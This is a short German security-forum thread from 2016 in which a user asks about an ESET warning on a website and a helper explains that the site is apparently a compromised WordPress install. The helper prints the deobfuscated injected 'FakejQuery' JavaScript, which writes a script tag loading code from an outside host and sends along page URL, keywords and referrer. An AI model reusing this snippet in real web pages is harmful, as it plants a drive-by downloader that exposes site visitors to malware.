Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Diskussionsforum (https://www.trojaner-board.de/diskussionsforum/)
-   -   Bei Aufruf von Webseite warnt eset (https://www.trojaner-board.de/183089-aufruf-webseite-warnt-eset.html)

stephan65 22.11.2016 14:19
Bei Aufruf von Webseite warnt eset
 
Hallo,
beim aufruf von hxxp://wolfgang-schmidbauer.de/
meldet Eset einen Trojaner:

Bedrohung erkannt

Der Zugriff auf die Webseite wurde blockiert.
hxxp://wolfgang-schmidbauer.de

Bedrohung: JS/TrojanDownloader.FakejQuery.B Trojaner


ESET-Knowledgebase öffnen | www.eset.com

Ist das ein Fehlalarm ? Die Seite ist mir als seriös bekannt.

Mfg
Stephan

iceweasel 22.11.2016 14:48
Ich würde die Seite auch nicht aufrufen:

https://sitecheck.sucuri.net/results/wolfgang-schmidbauer.de

Liegt wahrscheinlich an eine Wordpress-Sicherheitslücke, obwohl scheinbar die aktuelle Version eingesetzt wird.

stephan65 22.11.2016 14:58
Danke für die schnelle Antwort. Und was macht dieses Teil ?

iceweasel 22.11.2016 15:38
Naja irgendwie sind wohl laut

https://quttera.com/detailed_report/...schmidbauer.de

insgesamt 62 Files verseucht.

Hier mal der zurück übersetzte JavaScript-Code:
Code:
[
    [ < script >
        var a = '';setTimeout(1);

        function setCookie(a, b, c) {
            var d = new Date;
            d.setTime(d.getTime() + 60 * c * 60 * 1e3);
            var e = "expires=" + d.toUTCString();
            document.cookie = a + "=" + b + "; " + e
        }

        function getCookie(a) {
            for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
                for (var e = c[d];
                    " " == e.charAt(0);) e = e.substring(1);
                if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
            }
            return null
        }
        null == getCookie("__cfgoid") % 26 % 26(setCookie("__cfgoid", 1, 1), 1 == getCookie("__cfgoid") % 26 % 26(setCookie("__cfgoid", 2, 1), document.write('<script type="text/javascript" src="' + 'http://93247.webhosting35.1blu.de/js/jquery.min.php' + '?key=b64' + '%26utm_campaign=' + 'J18171' + '%26utm_source=' + window.location.host + '%26utm_medium=' + '%26utm_content=' + window.location + '%26utm_term=' + encodeURIComponent(((k = (function() {
            var keywords = '';
            var metas = document.getElementsByTagName('meta');
            if (metas) {
                for (var x = 0, y = metas.length; x < y; x++) {
                    if (metas[x].name.toLowerCase() == "keywords") {
                        keywords += metas[x].content;
                    }
                }
            }
            return keywords !== '' ? keywords : null;
        })()) == null ? (v = window.location.search.match(/utm_term=([^%26]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '%26se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'))); < /script>]]
Interessant ist in dem Quellcode wohl nur: hxxp://93247.webhosting35.1blu.de/js/jquery.min.php

Hier weitere fakejquerys: http://pastebin.com/KiZshzX4

stephan65 22.11.2016 15:46
Danke.
Also definitiv Finger weg ?


Alle Zeitangaben in WEZ +1. Es ist jetzt 00:02 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131